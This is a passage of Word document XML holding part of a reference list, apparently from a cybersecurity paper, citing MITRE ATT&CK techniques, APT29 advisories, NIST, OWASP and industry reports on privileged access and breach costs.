      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>[37</w:t>
      </w:r>
      <w:r w:rsidR="00AE0216" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00AE0216" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AE0216" w:rsidRPr="00C57BFC">
        <w:t>BeyondTrust</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AE0216" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve">. “Just-In-Time (JIT) Privileged Access Management (PAM): The Missing    </w:t>
      </w:r>
      <w:r w:rsidR="00AE0216" w:rsidRPr="00C57BFC">
        <w:br/>
        <w:t xml:space="preserve">        Piece to Achieving True Least Privilege.”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474507" w:rsidRPr="00C57BFC" w:rsidRDefault="00474507" w:rsidP="00474507">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[38] NIST. "SP 800-115: Technical Guide to Information Security Testing and Assessment," </w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        Sept. 2008.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00570D0F" w:rsidRPr="00C57BFC" w:rsidRDefault="00570D0F" w:rsidP="00570D0F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[39] Hutchins, E. M., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cloppert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, M. J., &amp; Amin, R. M. "Intelligence-Driven Computer Network </w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains."</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        Lockheed Martin Corporation, 2011.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD2924" w:rsidRPr="00C57BFC" w:rsidRDefault="00AD2924" w:rsidP="00AD2924">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[40] MITRE ATT&amp;CK. "APT29, Group G0016." </w:t>
      </w:r>
      <w:hyperlink r:id="rId73" w:history="1">
        <w:r w:rsidRPr="00C57BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://attack.mitre.org/groups/G0016/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00AD2924" w:rsidRPr="00C57BFC" w:rsidRDefault="00AD2924" w:rsidP="00AD2924">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[41] National Cyber Security Centre (NCSC). "Advisory: APT29 targets COVID-19 vaccine </w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        development," July 2020. https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        vaccine-development</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0024517E" w:rsidRPr="00C57BFC" w:rsidRDefault="0024517E" w:rsidP="0024517E">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[42] Cybersecurity and Infrastructure Security Agency (CISA). "Russian SVR Targets U.S. and</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        Allied Networks," April 2021.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F4D4B" w:rsidRPr="00C57BFC" w:rsidRDefault="001F4D4B" w:rsidP="001F4D4B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[43] MITRE Corporation. "MITRE ATT&amp;CK Framework."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F4D4B" w:rsidRPr="00C57BFC" w:rsidRDefault="001F4D4B" w:rsidP="001F4D4B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[44] MITRE ATT&amp;CK. "T1566.001: Phishing: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attachment."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00715FD1" w:rsidRPr="00C57BFC" w:rsidRDefault="00715FD1" w:rsidP="00715FD1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[45] MITRE ATT&amp;CK. "T1059.001: Command and Scripting Interpreter: PowerShell." </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00715FD1" w:rsidRPr="00C57BFC" w:rsidRDefault="00715FD1" w:rsidP="00715FD1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[46] MITRE ATT&amp;CK. "T1053.005: Scheduled Task/Job: Scheduled Task." </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00715FD1" w:rsidRPr="00C57BFC" w:rsidRDefault="00715FD1" w:rsidP="00715FD1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[47] MITRE ATT&amp;CK. "T1134.001: Access Token Manipulation: Token Impersonation/Theft." </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00715FD1" w:rsidRPr="00C57BFC" w:rsidRDefault="00715FD1" w:rsidP="00715FD1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">[48] MITRE ATT&amp;CK. "T1003.001: OS Credential Dumping: LSASS Memory." </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00715FD1" w:rsidRPr="00C57BFC" w:rsidRDefault="00715FD1" w:rsidP="00715FD1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[49] MITRE ATT&amp;CK. "T1087.002: Account Discovery: Domain Account." </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00715FD1" w:rsidRPr="00C57BFC" w:rsidRDefault="00715FD1" w:rsidP="00715FD1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[50] MITRE ATT&amp;CK. "T1021.001: Remote Services: Remote Desktop Protocol." </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00715FD1" w:rsidRPr="00C57BFC" w:rsidRDefault="00715FD1" w:rsidP="00715FD1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[51] MITRE ATT&amp;CK. "T1213: Data from Information Repositories." </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00715FD1" w:rsidRPr="00C57BFC" w:rsidRDefault="00715FD1" w:rsidP="00715FD1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[52] MITRE ATT&amp;CK. "T1567.002: Exfiltration Over Web Service: Exfiltration to Cloud Storage." </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C50878" w:rsidRPr="00C57BFC" w:rsidRDefault="00715FD1" w:rsidP="00715FD1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[53] </w:t>
      </w:r>
      <w:hyperlink r:id="rId74" w:history="1">
        <w:r w:rsidR="00C50878" w:rsidRPr="00C57BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://howtofix.guide/ransomware-operators-use-cobalt-strike/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00715FD1" w:rsidRPr="00C57BFC" w:rsidRDefault="00715FD1" w:rsidP="00715FD1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[54] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Deply</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, B. "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">." GitHub repository. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00715FD1" w:rsidRPr="00C57BFC" w:rsidRDefault="00715FD1" w:rsidP="00715FD1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[55] Robbins, A., et al. "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BloodHound</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="cf01"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: Six Degrees of Domain Admin." DEF CON 24, 2016. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7CF8" w:rsidRPr="00C57BFC" w:rsidRDefault="007F7CF8" w:rsidP="007241A0">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="007241A0" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>56</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">] OWASP. "OWASP Top Ten 2021: A07:2021 – Identification and Authentication Failures." </w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:hyperlink r:id="rId75" w:history="1">
        <w:r w:rsidR="007241A0" w:rsidRPr="00C57BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="007F7CF8" w:rsidRPr="00C57BFC" w:rsidRDefault="00372D62" w:rsidP="007F7CF8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>[57</w:t>
      </w:r>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Mandiant</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>. "M-Trends 2024:</w:t>
      </w:r>
      <w:r w:rsidR="00682B01" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> A View </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00682B01" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>From</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00682B01" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> the Front Lines."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7CF8" w:rsidRPr="00C57BFC" w:rsidRDefault="00372D62" w:rsidP="007F7CF8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>[58</w:t>
      </w:r>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Ponemon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Institute. "The Value of Endpoint Detection and Response," commissioned by</w:t>
      </w:r>
      <w:r w:rsidR="00682B01" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00682B01" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>CrowdStrike</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00682B01" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">, 2023. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7CF8" w:rsidRPr="00C57BFC" w:rsidRDefault="00372D62" w:rsidP="007F7CF8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>[59]</w:t>
      </w:r>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> IBM Security. "Cost of a Data Breach Report 2024: Impact o</w:t>
      </w:r>
      <w:r w:rsidR="00682B01" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">f Security AI and </w:t>
      </w:r>
      <w:r w:rsidR="00682B01" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        Automation."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230D71" w:rsidRPr="00C57BFC" w:rsidRDefault="00372D62" w:rsidP="00230D71">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>[60]</w:t>
      </w:r>
      <w:r w:rsidR="007F7CF8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Forrester Consulting. "The Total Economic Impact of Microsoft Purview Data Loss</w:t>
